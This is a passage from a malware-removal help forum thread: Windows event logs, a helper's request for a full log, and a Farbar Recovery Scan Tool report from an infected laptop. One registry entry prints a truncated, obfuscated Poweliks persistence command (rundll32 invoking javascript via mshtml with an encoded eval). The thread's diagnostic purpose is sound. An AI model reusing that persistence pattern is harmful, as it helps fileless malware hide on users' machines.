Error: (10/18/2014 10:51:20 AM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3011) (User: NT AUTHORITY)
Description: Unloading the performance counter strings for service WmiApRpl (WmiApRpl) failed. The first DWORD in the Data section contains the error code.

System errors:
=============
Error: (10/29/2014 00:16:09 PM) (Source: WMPNetworkSvc) (EventID: 14346) (User: )
Description: 0x80040154

Error: (10/29/2014 00:16:09 PM) (Source: WMPNetworkSvc) (EventID: 14346) (User: )
Description: 0x80040154

Error: (10/29/2014 00:16:01 PM) (Source: DCOM) (EventID: 10010) (User: )
Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

Error: (10/29/2014 00:14:30 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The regi service failed to start due to the following error:
%%2

Error: (10/29/2014 00:09:23 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The Diagnostic Policy Service service failed to start due to the following error:
%%1069

Error: (10/29/2014 00:09:23 PM) (Source: Service Control Manager) (EventID: 7038) (User: )
Description: The DPS service was unable to log on as NT AUTHORITY\LocalService with the currently configured password due to the following error:
%%50

To ensure that the service is configured properly, use the Services snap-in in Microsoft Management Console (MMC).

Error: (10/29/2014 00:09:23 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The Base Filtering Engine service failed to start due to the following error:
%%1069

Error: (10/29/2014 00:09:23 PM) (Source: Service Control Manager) (EventID: 7038) (User: )
Description: The BFE service was unable to log on as NT AUTHORITY\LocalService with the currently configured password due to the following error:
%%50

To ensure that the service is configured properly, use the Services snap-in in Microsoft Management Console (MMC).

Error: (10/29/2014 00:09:23 PM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: The Windows Firewall service depends on the Base Filtering Engine service which failed to start because of the following error:
%%1069

Error: (10/29/2014 00:09:23 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The Base Filtering Engine service failed to start due to the following error:
%%1069

Microsoft Office Sessions:
=========================
Error: (05/27/2011 10:48:56 AM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
Description: ID: 3, Application Name: Microsoft Office PowerPoint, Application Version: 12.0.6545.5000, Microsoft Office Version: 12.0.6425.1000. This session lasted 6 seconds with 0 seconds of active time.  This session ended with a crash.

Error: (09/20/2010 11:05:12 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
Description: ID: 0, Application Name: Microsoft Office Word, Application Version: 12.0.6541.5000, Microsoft Office Version: 12.0.6425.1000. This session lasted 6 seconds with 0 seconds of active time.  This session ended with a crash.

CodeIntegrity Errors:
===================================
  Date: 2014-10-29 11:44:06.791
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Program Files (x86)\AVG\AVG2015\avghooka.dll because the set of per-page image hashes could not be found on the system.

  Date: 2009-12-02 12:51:40.835
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\swwork\DPIUP\TPDEVPE.SYS because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

  Date: 2009-12-02 12:51:40.835
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\swwork\DPIUP\TPDEVPE.SYS because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

==================== Memory info ===========================

Processor: Intel® Core2 Duo CPU P8600 @ 2.40GHz
Percentage of memory in use: 51%
Total physical RAM: 2968.03 MB
Available physical RAM: 1444.92 MB
Total Pagefile: 5934.23 MB
Available Pagefile: 3459.91 MB
Total Virtual: 8192 MB
Available Virtual: 8191.82 MB

==================== Drives ================================

Drive c: (Windows7_OS) (Fixed) (Total:138.11 GB) (Free:12.91 GB) NTFS ==>[system with boot components (obtained from reading drive)]
Drive q: (Lenovo_Recovery) (Fixed) (Total:9.77 GB) (Free:2.27 GB) NTFS

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (Size: 149.1 GB) (Disk ID: 823B4BFF)
Partition 1: (Active) - (Size=1.2 GB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=138.1 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=9.8 GB) - (Type=07 NTFS)

==================== End Of Log ============================

 

 

 

 

 

 

 

 

 

[kevinf80]

Hello and

 

P2P/Piracy Warning:

 

If you're using Peer 2 Peer software such as uTorrent, BitTorrent or similar you must either fully uninstall them or completely disable them from running while being assisted here.Failure to remove or disable such software will result in your topic being closed and no further assistance being provided.If you have illegal/cracked software, cracks, keygens etc. on the system, please remove or uninstall them now and read the policy on Piracy.

 

The first log FRST.txt is not complete, you only post partial log. Post the full log please, will be here: C:\FRST\Logs

 

Thanks,

 

Kevin..

[chazzini]

That's weird.  I'll try again.  Also, I've been getting "powershell" stopped responding errors as well.  Also, the FRTS is constantly running.  After completing and generating the log, it starts the scan again.

 

FRTS LOG

Scan result of Farbar Recovery Scan Tool (FRST.txt) (x64) Version: 29-10-2014 01
Ran by Charles (administrator) on CHARLES-THINK on 29-10-2014 12:57:12
Running from C:\Users\Charles\Desktop
Loaded Profile: Charles (Available profiles: Charles)
Platform: Windows 7 Home Premium Service Pack 1 (X64) OS Language: English (United States)
Internet Explorer Version 10
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2015\avgrsa.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2015\avgcsrva.exe
() C:\Windows\System32\DTS.exe
(Lenovo.) C:\Windows\System32\ibmpmsvc.exe
(AuthenTec, Inc.) C:\Windows\System32\AtService.exe
(Microsoft Corporation) C:\Windows\System32\wlanext.exe
(Lenovo) C:\Program Files (x86)\Lenovo\Access Connections\AcPrfMgrSvc.exe
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2015\avgidsagent.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2015\avgwdsvc.exe
(Microsoft Corporation) C:\Program Files (x86)\Microsoft Small Business\Business Contact Manager\BcmSqlStartupSvc.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(Intel® Corporation) C:\Program Files\Intel\WiFi\bin\EvtEng.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2015\avgnsa.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2015\avgemca.exe
(Lenovo Group Limited) C:\Program Files\Lenovo\Communications Utility\CamMute.exe
(Lenovo Group Limited) C:\Program Files\Lenovo\Communications Utility\TPKNRSVC.exe
(Intel® Corporation) C:\Program Files\Common Files\Intel\WirelessCommon\RegSrvc.exe
(Microsoft Corporation) C:\Program Files (x86)\Microsoft\Search Enhancement Pack\SeaPort\SeaPort.exe
(Microsoft Corporation) C:\Program Files (x86)\Microsoft SQL Server\90\Shared\sqlbrowser.exe
(Lenovo Group Limited) C:\Program Files\Lenovo\HOTKEY\TPHKSVC.exe
(Viewpoint Corporation) C:\Program Files (x86)\Viewpoint\Common\ViewpointService.exe
(AVG Secure Search) C:\Program Files (x86)\Common Files\AVG Secure Search\vToolbarUpdater\18.1.10\ToolbarUpdater.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
(Lenovo) C:\Program Files (x86)\Lenovo\Access Connections\AcSvc.exe
(Lenovo Group Limited) C:\Program Files\Lenovo\HOTKEY\tphkload.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE
() C:\Program Files (x86)\Common Files\AVG Secure Search\vToolbarUpdater\18.1.10\loggingserver.exe
(Lenovo Group Limited) C:\Program Files\Lenovo\HOTKEY\TPOSDSVC.exe
(Lenovo Group Limited) C:\Program Files\Lenovo\HOTKEY\shtctky.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
(Lenovo Group Limited) C:\Program Files\Lenovo\ZOOM\TpScrex.exe
(Lenovo Group Limited) C:\Program Files\Lenovo\HOTKEY\TPONSCR.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPLpr.exe
(Lenovo.) C:\Windows\System32\TpShocks.exe
(Lenovo Group Limited) C:\Program Files\Lenovo\Client Security Solution\cssauth.exe
(Intel Corporation) C:\Windows\System32\hkcmd.exe
(Intel Corporation) C:\Windows\System32\igfxpers.exe
(Lenovo Group Limited) C:\Program Files\Lenovo\Communications Utility\TpKnrres.exe
(Broadcom Corporation.) C:\Program Files\ThinkPad\Bluetooth Software\BTTray.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Viewpoint Corporation) C:\Program Files (x86)\Viewpoint\Viewpoint Manager\ViewMgr.exe
(Lenovo) C:\Program Files (x86)\Lenovo\Access Connections\SvcGuiHlpr.exe
(Microsoft Corporation) C:\Windows\SysWOW64\rundll32.exe
(Adobe Systems Inc.) C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat\acrotray.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Lenovo Group Limited) C:\Program Files\Lenovo\Client Security Solution\password_manager.exe
(Apple Inc.) C:\Program Files (x86)\iTunes\iTunesHelper.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2015\avgui.exe
() C:\Program Files (x86)\AVG Web TuneUp\vprot.exe
(Lenovo Group Limited) C:\Program Files (x86)\ThinkPad\Utilities\SCHTASK.EXE
(Apple Inc.) C:\Program Files\iPod\bin\iPodService.exe
(Intel Corporation) C:\Windows\System32\igfxext.exe
(Intel Corporation) C:\Windows\System32\igfxsrvc.exe
(Lenovo Group Limited) C:\Program Files (x86)\Lenovo\Client Security Solution\password_manager.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Broadcom Corporation.) C:\Program Files\ThinkPad\Bluetooth Software\btwdins.exe
(Dropbox, Inc.) C:\Users\Charles\AppData\Roaming\Dropbox\bin\Dropbox.exe
(Microsoft Corporation) C:\Program Files (x86)\Microsoft Office\Office12\ONENOTEM.EXE
(InterVideo) C:\Program Files (x86)\Common Files\InterVideo\RegMgr\iviRegMgr.exe
(Intel Corporation) C:\Program Files (x86)\Intel\AMT\LMS.exe
(Microsoft Corporation) C:\Program Files\Microsoft SQL Server\90\Shared\sqlwriter.exe
(Lenovo) C:\Program Files (x86)\ThinkPad\Utilities\PWMDBSVC.exe
(Lenovo Group Limited) C:\Program Files (x86)\Common Files\Lenovo\tvt_reg_monitor_svc.exe
(Intel Corporation) C:\Program Files (x86)\Common Files\Intel\Privacy Icon\UNS\UNS.exe
(AVG Secure Search) C:\Program Files (x86)\AVG Web TuneUp\avgcefrend.exe
(Microsoft Corporation) C:\Program Files\Internet Explorer\iexplore.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\System32\MsSpellCheckingFacility.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe

==================== Registry (Whitelisted) ==================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [picon] => C:\Program Files (x86)\Common Files\Intel\Privacy Icon\PrivacyIconClient.exe [358424 2009-08-03] (Intel Corporation)
HKLM\...\Run: [TpShocks] => C:\Windows\system32\TpShocks.exe [380704 2009-07-08] (Lenovo.)
HKLM\...\Run: [FingerPrintSoftware] => C:\Program Files\Lenovo Fingerprint Software\fpapp.exe [1582328 2009-09-01] (AuthenTec)
HKLM\...\Run: [AcWin7Hlpr] => C:\Program Files (x86)\Lenovo\Access Connections\AcTBenabler.exe [63832 2014-03-14] (Lenovo)
HKLM\...\Run: [cssauth] => C:\Program Files\Lenovo\Client Security Solution\cssauth.exe [5990200 2011-06-10] (Lenovo Group Limited)
HKLM\...\Run: [LenVolFx] => C:\Windows\LenVolEx64.exe [15208 2009-11-02] (Lenovo)
HKLM\...\Run: [LENOVO.TPKNRRES] => C:\Program Files\Lenovo\Communications Utility\TPKNRRES.exe [60920 2013-05-29] (Lenovo Group Limited)
HKLM\...\Run: [smartAudio] => C:\Program Files\CONEXANT\SAII\SAIICpl.exe [307768 2009-11-19] ()
HKLM-x32\...\Run: [PWMTRV] => rundll32 "C:\Program Files (x86)\ThinkPad\Utilities\PWMTR64V.DLL",PwrMgrBkGndMonitor
HKLM-x32\...\Run: [GrooveMonitor] => C:\Program Files (x86)\Microsoft Office\Office12\GrooveMonitor.exe [30040 2009-02-26] (Microsoft Corporation)
HKLM-x32\...\Run: [WheelMouse] => C:\Advanced Wheel Mouse\wh_exec.exe [86016 2007-03-11] ()
HKLM-x32\...\Run: [APSDaemon] => C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe [43848 2014-02-06] (Apple Inc.)
HKLM-x32\...\Run: [] => [X]
HKLM-x32\...\Run: [Acrobat Assistant 8.0] => C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat\Acrotray.exe [840592 2014-09-04] (Adobe Systems Inc.)
HKLM-x32\...\Run: [Adobe ARM] => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [959176 2014-08-21] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [Adobe Acrobat Speed Launcher] => C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat\Acrobat_sl.exe [41360 2014-09-04] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [DivXMediaServer] => C:\Program Files (x86)\DivX\DivX Media Server\DivXMediaServer.exe [450560 2013-08-21] (DivX, LLC)
HKLM-x32\...\Run: [DivXUpdate] => C:\Program Files (x86)\DivX\DivX Update\DivXUpdate.exe [1861968 2013-08-28] ()
HKLM-x32\...\Run: [QuickTime Task] => C:\Program Files (x86)\QuickTime\QTTask.exe [421888 2014-01-17] (Apple Inc.)
HKLM-x32\...\Run: [iTunesHelper] => C:\Program Files (x86)\iTunes\iTunesHelper.exe [152392 2014-02-21] (Apple Inc.)
HKLM-x32\...\Run: [sunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [271744 2014-09-26] (Oracle Corporation)
HKLM-x32\...\Run: [AVG_UI] => C:\Program Files (x86)\AVG\AVG2015\avgui.exe [3649040 2014-10-16] (AVG Technologies CZ, s.r.o.)
HKLM-x32\...\Run: [vProt] => C:\Program Files (x86)\AVG Web TuneUp\vprot.exe [3037208 2014-10-29] ()
Winlogon\Notify\igfxcui: C:\Windows\system32\igfxdev.dll (Intel Corporation)
HKU\S-1-5-21-3094523011-22438472-3966868382-1003\...\Run: [Adobe Acrobat Synchronizer] => C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat\AdobeCollabSync.exe [1104288 2014-09-04] (Adobe Systems Incorporated)
HKU\S-1-5-21-3094523011-22438472-3966868382-1003\...\Run: [ROC_ROC_APR2013_AV] => C:\Users\Charles\AppData\Roaming\AVG April 2013 Campaign\AVG-Secure-Search-Update.exe /PROMPT --mid 1fd7f8e2d15802a9a91c4e3ce4a00c4e-7ee74b05d6d362cf5e6b3a8d6b5b082e5cfa3b2d --CMPID ROC_APR2013_AV
HKU\S-1-5-21-3094523011-22438472-3966868382-1003\...\Run: [AVG-Secure-Search-Update_0913a] => C:\Users\Charles\AppData\Roaming\AVG 0913a Campaign\AVG-Secure-Search-Update-0913a.exe /PROMPT --mid 1fd7f8e2d15802a9a91c4e3ce4a00c4e-7ee74b05d6d362cf5e6b3a8d6b5b082e5cfa3b2d --CMPID 0913a
HKU\S-1-5-21-3094523011-22438472-3966868382-1003\...\MountPoints2: {f397cc25-9f37-11e0-9bf5-00226819c704} - D:\LaunchU3.exe
HKU\S-1-5-21-3094523011-22438472-3966868382-1003\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!
Lsa: [Notification Packages] scecli ACGina
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Bluetooth.lnk
ShortcutTarget: Bluetooth.lnk -> C:\Program Files\ThinkPad\Bluetooth Software\BTTray.exe (Broadcom Corporation.)
Startup: C:\Users\Charles\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dropbox.lnk
ShortcutTarget: Dropbox.lnk -> C:\Users\Charles\AppData\Roaming\Dropbox\bin\Dropbox.exe (Dropbox, Inc.)
Startup: C:\Users\Charles\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OneNote 2007 Screen Clipper and Launcher.lnk
ShortcutTarget: OneNote 2007 Screen Clipper and Launcher.lnk -> C:\Program Files (x86)\Microsoft Office\Office12\ONENOTEM.EXE (Microsoft Corporation)

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

HKCU\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://lenovo.msn.com
HKCU\Software\Microsoft\Internet Explorer\Main,Default_Secondary_Page_URL = http://www.lenovo.com/welcome/thinkpad
SearchScopes: HKLM - {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKLM-x32 - {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKCU - DefaultScope {7ABD5EFD-88A6-E9CE-80AE-DBCA8C52F41C} URL = http://www.bing.com/search?q={searchTerms}&pc=Z134&form=ZGAIDF&install_date=20110828&iesrc={referrer:source}
SearchScopes: HKCU - VWPT URL = http://search.viewpoint.com/pl/search?tab=1&k={searchTerms}&addr=1&query=vb=1%26tn%3D0%26addr%3D1%26type%3Drel39%5fvista%26instid%3DViewpointV39%5fvista
SearchScopes: HKCU - {7ABD5EFD-88A6-E9CE-80AE-DBCA8C52F41C} URL = http://www.bing.com/search?q={searchTerms}&pc=Z134&form=ZGAIDF&install_date=20110828&iesrc={referrer:source}
SearchScopes: HKCU - {95B7759C-8C7F-4BF1-B163-73684A933233} URL = https://mysearch.avg.com/search?cid={CF064197-EF34-483D-9875-B1E2E5BC5836}&mid=1fd7f8e2d15802a9a91c4e3ce4a00c4e-7ee74b05d6d362cf5e6b3a8d6b5b082e5cfa3b2d〈=en&ds=AVG&coid=avgtbavg&cmpid=&pr=fr&d=2014-10-29 11:52:56&v=4.0.0.17&pid=wtu&sg=&sap=dsp&q={searchTerms}
SearchScopes: HKCU - {D552A914-C4D7-44A7-89F3-51389FAACF75} URL =
BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)
BHO: Java Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre6\bin\jp2ssv.dll No File
BHO-x32: Search Helper -> {6EBF7485-159F-4bff-A14F-B9E3AAC4465B} -> C:\Program Files (x86)\Microsoft\Search Enhancement Pack\Search Helper\SEPsearchhelperie.dll (Microsoft Corporation)
BHO-x32: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files (x86)\Microsoft Office\Office12\GrooveShellExtensions.dll (Microsoft Corporation)
BHO-x32: Java Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre7\bin\ssv.dll (Oracle Corporation)
BHO-x32: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)
BHO-x32: AVG Web TuneUp -> {95B7759C-8C7F-4BF1-B163-73684A933233} -> C:\Program Files (x86)\AVG Web TuneUp\4.0.0.17\AVG Web TuneUp.dll (AVG)
BHO-x32: Viewpoint Toolbar BHO -> {A7327C09-B521-4EDB-8509-7D2660C9EC98} -> C:\Program Files (x86)\Viewpoint\Viewpoint Toolbar\3.9.0\ViewBarBHO.dll (Viewpoint Corporation)
BHO-x32: CrossRider -> {A876E312-7D08-401a-B7A6-FAFC5DC2F292} -> C:\Program Files (x86)\CrossriderWebApps\Crossrider.dll ()
BHO-x32: Adobe PDF Conversion Toolbar Helper -> {AE7CD045-E861-484f-8273-0445EE161910} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll (Adobe Systems Incorporated)
BHO-x32: IePasswordManagerHelper Class -> {BF468356-BB7E-42D7-9F15-4F3B9BCFCED2} -> C:\Program Files (x86)\Lenovo\Client Security Solution\tvtpwm_ie_com.dll (Lenovo Group Limited)
BHO-x32: Java Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre7\bin\jp2ssv.dll (Oracle Corporation)
BHO-x32: SmartSelect Class -> {F4971EE7-DAA0-4053-9964-665D8EE6A077} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll (Adobe Systems Incorporated)
Toolbar: HKLM-x32 - Viewpoint Toolbar - {F8AD5AA5-D966-4667-9DAF-2561D68B2012} - C:\Program Files (x86)\Common Files\Viewpoint\Toolbar Runtime\3.9.0\IEViewBar.dll (Viewpoint Corporation)
Toolbar: HKLM-x32 - Adobe PDF - {47833539-D0C5-4125-9FA8-0819E2EAAC93} - C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll (Adobe Systems Incorporated)
Toolbar: HKCU - No Name - {21FA44EF-376D-4D53-9B0F-8A89D3229068} -  No File
Toolbar: HKCU - No Name - {47833539-D0C5-4125-9FA8-0819E2EAAC93} -  No File
DPF: HKLM-x32 {2DAD3559-2923-4935-AD49-B673D2539944} http://www-307.ibm.com/pc/support/acpir.cab
DPF: HKLM-x32 {82E5DF24-51E8-47CD-864A-F4BD5005AA73} https://www.icloud.com/system/iCloud.cab
DPF: HKLM-x32 {9E472D58-F10C-11CF-B7A9-0020AFD6A362} https://vault.netvoyage.com/neWeb2/neWebCl.cab
DPF: HKLM-x32 {9E472D6A-F10C-11CF-B7A9-0020AFD6A362} https://vault.netvoyage.com/neWeb2/neCrypto.cab
DPF: HKLM-x32 {CC679CB8-DC4B-458B-B817-D447B3B6AC31} https://vpn01.bcm.edu/CACHE/stc/1/binaries/vpnweb.cab
Handler-x32: viprotocol - {B658800C-F66E-4EF3-AB85-6C0C227862A9} - C:\Program Files (x86)\Common Files\AVG Secure Search\ViProtocolInstaller\18.1.10\ViProtocol.dll (AVG Secure Search)
Tcpip\Parameters: [DhcpNameServer] 192.168.1.1

FireFox:
========
FF ProfilePath: C:\Users\Charles\AppData\Roaming\Mozilla\Firefox\Profiles\4orzi33e.default
FF DefaultSearchEngine: AVG Secure Search
FF SelectedSearchEngine: AVG Secure Search
FF Homepage: https://mysearch.avg.com?cid={CF064197-EF34-483D-9875-B1E2E5BC5836}&mid=1fd7f8e2d15802a9a91c4e3ce4a00c4e-7ee74b05d6d362cf5e6b3a8d6b5b082e5cfa3b2d〈=en&ds=AVG&coid=avgtbavg&cmpid=&pr=fr&d=2014-10-29 11:52:56&v=4.0.0.17&pid=wtu&sg=&sap=hp
FF Plugin: @divx.com/DivX VOD Helper,version=1.0.0 -> C:\Program Files\DivX\DivX OVS Helper\npovshelper.dll (DivX, LLC.)
FF Plugin: @microsoft.com/GENUINE -> disabled No File
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF32.dll No File
FF Plugin-x32: @Apple.com/iTunes,version=1.0 -> C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll ()
FF Plugin-x32: @avg.com/AVG SiteSafety plugin,version=11.0.0.1,application/x-avg-sitesafety-plugin -> C:\Program Files (x86)\Common Files\AVG Secure Search\SiteSafetyInstaller\18.1.10\\npsitesafety.dll No File
FF Plugin-x32: @divx.com/DivX VOD Helper,version=1.0.0 -> C:\Program Files (x86)\DivX\DivX OVS Helper\npovshelper.dll (DivX, LLC.)
FF Plugin-x32: @divx.com/DivX Web Player Plug-In,version=1.0.0 -> C:\Program Files (x86)\DivX\DivX Web Player\npdivx32.dll (DivX, LLC)
FF Plugin-x32: @google.com/npPicasa3,version=3.0.0 -> C:\Program Files (x86)\Google\Picasa3\npPicasa3.dll (Google, Inc.)
FF Plugin-x32: @java.com/DTPlugin,version=10.71.2 -> C:\Program Files (x86)\Java\jre7\bin\dtplugin\npDeployJava1.dll (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=10.71.2 -> C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)
FF Plugin-x32: @microsoft.com/GENUINE -> disabled No File
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/OfficeLive,version=1.5 -> C:\Program Files (x86)\Microsoft\Office Live\npOLW.dll (Microsoft Corp.)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3502.0922 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3508.1109 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.25.5\npGoogleUpdate3.dll (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.25.5\npGoogleUpdate3.dll (Google Inc.)
FF Plugin-x32: Adobe Acrobat -> C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat\Air\nppdf32.dll (Adobe Systems Inc.)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\nppdf32.dll (Adobe Systems Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npqtplugin.dll (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npqtplugin2.dll (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npqtplugin3.dll (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npqtplugin4.dll (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npqtplugin5.dll (Apple Inc.)
FF SearchPlugin: C:\Users\Charles\AppData\Roaming\Mozilla\Firefox\Profiles\4orzi33e.default\searchplugins\avg-secure-search.xml
FF SearchPlugin: C:\Program Files (x86)\mozilla firefox\browser\searchplugins\wtu-secure-search.xml
FF Extension: AVG Web TuneUp - C:\Users\Charles\AppData\Roaming\Mozilla\Firefox\Profiles\4orzi33e.default\Extensions\avg@toolbar [2014-10-29]
FF HKLM-x32\...\Firefox\Extensions: [web2pdfextension@web2pdf.adobedotcom] - C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat\Browser\WCFirefoxExtn
FF Extension: Adobe Acrobat - Create PDF - C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat\Browser\WCFirefoxExtn [2012-03-16]
FF HKCU\...\Firefox\Extensions: [{F74D5734-46F5-4B16-96F0-1E7FBF41B750}] - C:\Program Files (x86)\Lenovo\Client Security Solution\PWM Firefox Extension\2.0b12
FF Extension: ThinkVantage Password Manager - C:\Program Files (x86)\Lenovo\Client Security Solution\PWM Firefox Extension\2.0b12 [2013-11-21]

Chrome:
=======
CHR HKLM-x32\...\Chrome\Extension: [jpnbdefcbnoefmmcpelplabbkfmfhlho] - C:\ProgramData\CodecCheck\chrome\codec_check.crx [2011-08-28]

==================== Services (Whitelisted) =================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

S3 ADMonitor; C:\Windows\system32\ADMonitor.exe [130048 2009-09-01] () [File not signed]
R2 ATService; C:\Windows\system32\AtService.exe [2498296 2009-09-01] (AuthenTec, Inc.)
R2 AVGIDSAgent; C:\Program Files (x86)\AVG\AVG2015\avgidsagent.exe [3487248 2014-10-16] (AVG Technologies CZ, s.r.o.)
R2 avgwd; C:\Program Files (x86)\AVG\AVG2015\avgwdsvc.exe [298080 2014-10-16] (AVG Technologies CZ, s.r.o.)
S3 DozeSvc; C:\Program Files (x86)\ThinkPad\Utilities\DZSVC64.EXE [319536 2014-09-10] (Lenovo.)
R2 dtsvc; C:\Windows\system32\DTS.exe [117760 2009-09-01] () [File not signed]
